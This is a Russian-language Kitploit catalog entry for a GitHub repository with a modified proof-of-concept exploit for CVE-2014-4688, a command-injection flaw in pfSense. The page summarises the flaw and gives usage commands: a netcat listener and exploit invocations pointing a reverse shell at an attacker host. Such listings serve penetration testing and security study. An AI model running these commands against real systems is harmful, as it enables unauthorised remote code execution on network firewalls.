Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/jaydenblair/cve-2014-4688-pfsense
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubjaydenblair/cve-2014-4688-pfsense

CVE-2014-4688-pfsense

Модифицированный proof-of-concept эксплойт для CVE-2014-4688, уязвимости внедрения команд в pfSense status_rrd_graph_img.php, позволяющий аутентифицированное удаленное выполнение кода с поддержкой SSL.

Репозиторий
16 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2014-4688 – Внедрение команд в pfSense

Модифицированное доказательство концепции Exploit-DB для CVE-2014-4688 (внедрение команд в status_rrd_graph_img.php в pfSense)

Обзор

Этот репозиторий содержит модифицированную версию оригинального доказательства концепции из Exploit-DB для CVE-2014-4688, затрагивающей pfSense версий ≤ 2.1.3.

Уязвимость существует в компоненте status_rrd_graph_img.php и позволяет аутентифицированным пользователям выполнять произвольные системные команды из-за некорректной санитации входных данных параметра database.

  • Оригинальный автор эксплойта: absolomb
  • Оригинальный источник: Exploit-DB

Сводка уязвимости

  • CVE: CVE-2014-4688
  • Затронутые версии: pfSense ≤ 2.1.3
  • Компонент: status_rrd_graph_img.php
  • Воздействие: Выполнение команд аутентифицированным пользователем

Аутентифицированный пользователь может внедрить произвольные команды оболочки через специально сформированный ввод, отправленный на уязвимую конечную точку.

Модификации

  • Добавлена обработка SSL на уровне сессии для окружений с самоподписанными сертификатами
  • Подавлены предупреждения urllib3 о небезопасных запросах

Использование

Запустите слушатель:

root@kitploit:~
nc -lvnp <LPORT>

Доказательство концепции:

root@kitploit:~
python3 cve-2014-4688.py --rhost <TARGET_IP> --lhost <ATTACKER_IP> --lport <PORT> --username <USERNAME> --password <PASSWORD>

Пример

root@kitploit:~
python3 cve-2014-4688.py --rhost 10.129.7.193 --lhost 10.10.15.12 --lport 443 --username Joebloggs --password Password

Отказ от ответственности

Этот репозиторий предоставлен только для авторизованных исследований в области безопасности, обучения и контролируемого тестирования. Несанкционированное использование против систем без явного разрешения незаконно и неэтично.

Скачать инструмент